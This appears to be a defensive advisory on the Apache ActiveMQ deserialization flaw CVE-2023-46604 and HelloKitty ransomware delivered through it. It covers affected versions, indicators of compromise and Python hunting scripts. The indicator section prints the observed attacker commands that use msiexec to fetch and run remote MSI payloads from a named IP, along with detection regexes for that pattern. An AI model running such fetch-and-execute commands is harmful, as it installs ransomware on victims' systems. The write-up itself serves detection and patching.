What is CVE-2023-46604 (Apache ActiveMQ)?

CVE-2023-46604 is a remote code execution vulnerability in Apache ActiveMQ. A remote attacker with network access to the broker can manipulate the serialized class types carried by the OpenWire protocol so that the broker instantiates any class on its classpath. The exploit chain is one of the more involved ones we have seen, but the root cause is insecure deserialization.

Apache disclosed the flaw and released fixed versions of ActiveMQ on October 25, 2023. Both proof-of-concept exploit code and technical details are publicly available. Rapid7's research team tested the public PoC and confirmed that the behavior observed in customer environments is consistent with exploitation of CVE-2023-46604. Rapid7's technical analysis of the vulnerability is published on AttackerKB.

Affected Products
According to Apache's advisory, CVE-2023-46604 impacts:

Apache ActiveMQ 5.18.0 before 5.18.3
Apache ActiveMQ 5.17.0 before 5.17.6
Apache ActiveMQ 5.16.0 before 5.16.7
Apache ActiveMQ before 5.15.16
Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3
Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6
Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7
Apache ActiveMQ Legacy OpenWire Module before 5.15.16
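The ranges above are the ones a practitioner has to encode when sweeping an inventory, and the 5.15 entry has no lower bound while the other three are bounded per branch. The following is an added example (not Apache's or Rapid7's code) that turns the advisory's list into a check; the version strings fed to it at the bottom are constructed for the demonstration.

```python
"""Check whether an Apache ActiveMQ version string falls inside the
ranges Apache's advisory lists for CVE-2023-46604.
Added example, not code from the advisory or from Rapid7."""
import re
from typing import Optional, Tuple

# Per branch: the first release that carries the fix. Anything on that
# branch below it is affected.
FIXED_IN = {
    (5, 18): (5, 18, 3),
    (5, 17): (5, 17, 6),
    (5, 16): (5, 16, 7),
}
# The 5.15 line and everything older is fixed only from 5.15.16 onward.
LEGACY_FIX = (5, 15, 16)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Pull major.minor.patch out of strings such as
    'apache-activemq-5.15.3' or 'ActiveMQ 5.18.2'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        return None
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> Optional[bool]:
    """True if the version is in an affected range, False if it is at or
    above the fix for its branch, None if no version could be parsed.
    Branches newer than 5.18 are not in the advisory and are reported
    as not affected (assumption: they were released with the fix)."""
    v = parse_version(version)
    if v is None:
        return None
    branch = v[:2]
    if branch in FIXED_IN:
        return v < FIXED_IN[branch]
    if branch <= (5, 15):
        return v < LEGACY_FIX
    return False


if __name__ == "__main__":
    # Constructed inventory; the 5.15.3 entry mirrors the install path
    # seen in the incident described on this page.
    for seen in ["apache-activemq-5.15.3", "5.18.3", "5.17.5", "5.16.7", "5.14.0"]:
        print(f"{seen:25} affected={is_affected(seen)}")
```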


How Does the Attack Work?
In a successful exploitation of the vulnerability, java.exe is running the targeted ActiveMQ application; in the case observed here, D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64 appeared as the parent process of the follow-on activity. After exploitation, the threat actor attempted to load remote binaries named M2.png and M4.png using MSIExec. The attempts to deploy ransomware were somewhat clumsy: in one event observed by Rapid7, there were more than half a dozen unsuccessful attempts to encrypt assets.



HelloKitty Ransomware Details


Rapid7 obtained the MSI files M4.png and M2.png from the IP address 172.245.16[.]125 and analyzed them in a controlled environment. Both MSI files contained a 32-bit .NET executable internally named dllloader. Inside dllloader, Rapid7 found an embedded Base64-encoded payload; decoding it yielded EncDLL, a 32-bit .NET DLL.

The EncDLL binary exhibits ransomware-like functionality: it searches for specific processes and terminates them, encrypts files with certain extensions using the .NET RSACryptoServiceProvider class, and appends the .locked extension to the encrypted files. Rapid7 also observed a function that lists the directories to be excluded from encryption, a constant holding the ransom note, and a function that attempts to communicate with an HTTP server at 172.245.16[.]125.

Indicators of Compromise

Rapid7's vulnerability research team analyzed CVE-2023-46604 and the publicly available exploit code. In the test setup, a single entry in the activemq.log file indicated successful exploitation of CVE-2023-46604:

2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616


In the example above, the attacker (here, the researcher) connected from 192.168.86.35, source port 15871, to the broker's OpenWire listener on TCP port 61616 (the part after the @). Depending on the logging configuration, more or less information may be available, and those settings can be adjusted. Note that this WARN line is a generic transport failure: any client that drops its connection abruptly produces the same message, so it should be treated as a lead to correlate with process activity on the broker host rather than as proof of exploitation on its own.
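A small parser for that log line, as an added example (not Rapid7's code), pulls out the fields that matter for a hunt, the remote address and port and the local listener port, and counts aborted connections per source so a burst from one address stands out. The log text at the top is constructed for the demonstration, modelled on the single line in the write-up, with two extra lines added: a normal startup message and an unrelated client disconnect from 10.0.0.7.

```python
"""Parse activemq.log for the transport-failure WARN line and summarise
which remote addresses produced it. Added example, not Rapid7's code."""
import re
from collections import Counter
from datetime import datetime

# Default ActiveMQ log layout: "timestamp | LEVEL | message | logger | thread".
# The thread name ends in tcp:///<remote ip>:<remote port>@<local port>.
TRANSPORT_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) \| WARN\s+\| "
    r"Transport Connection to: tcp://(?P<rip>[\d.]+):(?P<rport>\d+) failed: "
    r"(?P<exception>[^|]+?) \| (?P<logger>\S+) \| "
    r"ActiveMQ Transport: tcp:///(?P=rip):(?P=rport)@(?P<lport>\d+)\s*$"
)

# Constructed sample; line 2 is the line from the write-up verbatim.
SAMPLE_LOG = """\
2023-10-31 05:04:12,001 | INFO  | Apache ActiveMQ 5.15.3 (localhost, ID:broker-1) started | org.apache.activemq.broker.BrokerService | main
2023-10-31 05:04:58,736 | WARN  | Transport Connection to: tcp://192.168.86.35:15871 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15871@61616
2023-10-31 05:05:03,102 | WARN  | Transport Connection to: tcp://192.168.86.35:15880 failed: java.net.SocketException: An established connection was aborted by the software in your host machine | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///192.168.86.35:15880@61616
2023-10-31 05:09:41,555 | WARN  | Transport Connection to: tcp://10.0.0.7:50112 failed: java.io.EOFException | org.apache.activemq.broker.TransportConnection.Transport | ActiveMQ Transport: tcp:///10.0.0.7:50112@61616
"""


def parse_transport_failures(text):
    """Return one dict per matching WARN line with typed fields."""
    events = []
    for line in text.splitlines():
        m = TRANSPORT_FAIL.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S,%f")
        d["rport"] = int(d["rport"])
        d["lport"] = int(d["lport"])
        events.append(d)
    return events


def failures_by_source(events, exception_prefix="java.net.SocketException"):
    """Count failures per remote IP, keeping only the exception type the
    write-up reports so other kinds of client drop are not counted."""
    return Counter(e["rip"] for e in events
                   if e["exception"].startswith(exception_prefix))


def suspicious_sources(events, threshold=2):
    """Remote IPs that hit the threshold; the clumsy repeated attempts
    described above are what this is meant to surface."""
    return {ip for ip, n in failures_by_source(events).items() if n >= threshold}


if __name__ == "__main__":
    evts = parse_transport_failures(SAMPLE_LOG)
    for e in evts:
        print(e["ts"], e["rip"], e["rport"], "->", e["lport"], e["exception"][:40])
    print("repeat offenders:", suspicious_sources(evts))
```

The regex keys on the default log pattern; if conversionPattern in log4j configuration has been changed, the separators will differ and the expression needs adjusting to match.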

Other Indicators of Compromise:

http://172.245.16[.]125/m2.png
http://172.245.16[.]125/m4.png
Commands observed invoking msiexec to fetch and execute the packages:

cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m4.png"
cmd.exe /c "start msiexec /q /i hxxp://172.245.16[.]125/m2.png"

The following SHA-256 hashes belong to the two MSI packages downloaded from 172.245.16[.]125 and to the components extracted from them:

M2.msi: 8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4
M4.msi: 8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0
dllloader: C3C0CF25D682E981C7CE1CC0A00FA2B8B46CCE2FA49ABE38BB412DA21DA99CB7

EncDll: 3E65437F910F1F4E93809B81C19942EF74AA250AE228CACA0B278FC523AD47C5
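On the endpoint side, the indicators above reduce to three checks: msiexec being handed a package URL rather than a local path, a command line that references the IoC host, and the whole thing running under the ActiveMQ java.exe. The following is an added example (not Rapid7's code or tooling) that applies those checks to process-creation records of the kind an EDR or Sysmon event ID 1 provides, and matches a list of observed hashes against the IoC hashes. The process events and the observed hashes are constructed inline, modelled on what the page reports; the pid/ppid fields and the ancestry walk are assumptions about the telemetry shape.

```python
"""Hunt process telemetry and file hashes for the post-exploitation
activity described above. Added example, not Rapid7's code."""
import re


def refang(s: str) -> str:
    """Turn the defanged forms used in write-ups into matchable values."""
    return s.replace("[.]", ".").replace("hxxp", "http")


IOC_HOSTS = {refang("172.245.16[.]125")}
IOC_SHA256 = {  # lower-cased so lookups are case-insensitive
    "8177455ab89cc96f0c26bc42907da1a4f0b21fdc96a0cc96650843fd616551f4": "M2.msi",
    "8c226e1f640b570a4a542078a7db59bb1f1a55cf143782d93514e3bd86dc07a0": "M4.msi",
    "c3c0cf25d682e981c7ce1cc0a00fa2b8b46cce2fa49abe38bb412da21da99cb7": "dllloader",
    "3e65437f910f1f4e93809b81c19942ef74aa250ae228caca0b278fc523ad47c5": "EncDll",
}
# msiexec asked to install (/i) a package straight from a URL
MSIEXEC_URL = re.compile(r"msiexec(?:\.exe)?\b.*?\s/i\s+https?://(?P<host>[^/\s:]+)", re.I)
# java.exe living under an ActiveMQ install directory
ACTIVEMQ_JAVA = re.compile(r"activemq.*\\java\.exe$", re.I)

# Constructed telemetry: the chain the page describes plus one benign msiexec.
PROCESS_EVENTS = [
    {"pid": 4000, "ppid": 1, "image": r"D:\Program files\ActiveMQ\apache-activemq-5.15.3\bin\win64\java.exe",
     "cmdline": "java.exe -Dactivemq.home=D:\\Program files\\ActiveMQ org.apache.activemq.console.Main start"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd.exe /c "start msiexec /q /i http://172.245.16.125/m4.png"'},
    {"pid": 4101, "ppid": 4100, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /q /i http://172.245.16.125/m4.png"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec /i C:\\Users\\admin\\Downloads\\7zip.msi"},
]


def ancestors(events, pid):
    """Image paths from the process itself up the parent chain."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    return chain


def hunt_process_events(events):
    findings = []
    for e in events:
        reasons = []
        if MSIEXEC_URL.search(e["cmdline"]):
            reasons.append("msiexec installing a package from a remote URL")
        hit = next((h for h in IOC_HOSTS if h in e["cmdline"]), None)
        if hit:
            reasons.append(f"command line references IoC host {hit}")
        # Only qualify an existing hit; java.exe itself is not the finding.
        if reasons and any(ACTIVEMQ_JAVA.search(p) for p in ancestors(events, e["pid"])[1:]):
            reasons.append("spawned under ActiveMQ's java.exe")
        if reasons:
            findings.append({"pid": e["pid"], "image": e["image"], "reasons": reasons})
    return findings


def match_hashes(observed):
    """Map each observed SHA-256 that is a known IoC to its label."""
    return {h.lower(): IOC_SHA256[h.lower()] for h in observed if h.lower() in IOC_SHA256}


if __name__ == "__main__":
    for f in hunt_process_events(PROCESS_EVENTS):
        print(f["pid"], f["image"], "|", "; ".join(f["reasons"]))
    # Constructed observed hashes: one IoC (upper-cased) and one unrelated file.
    print(match_hashes(["8C226E1F640B570A4A542078A7DB59BB1F1A55CF143782D93514E3BD86DC07A0", "00" * 32]))
```

Alerting on the remote-URL msiexec pattern alone is worthwhile beyond this case; the ActiveMQ ancestry and the IoC host only raise the priority of a hit that is already suspicious.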


Preventive Measures Guide


Organizations should update to a patched version of ActiveMQ as soon as possible and should look for signs of compromise in their environments. The patched releases are available from Apache, and Apache also publishes guidance on hardening ActiveMQ deployments. Until the upgrade is done, restricting network access to the broker's OpenWire listener (TCP 61616 by default) to the hosts that actually need it narrows who can reach the vulnerable code path.




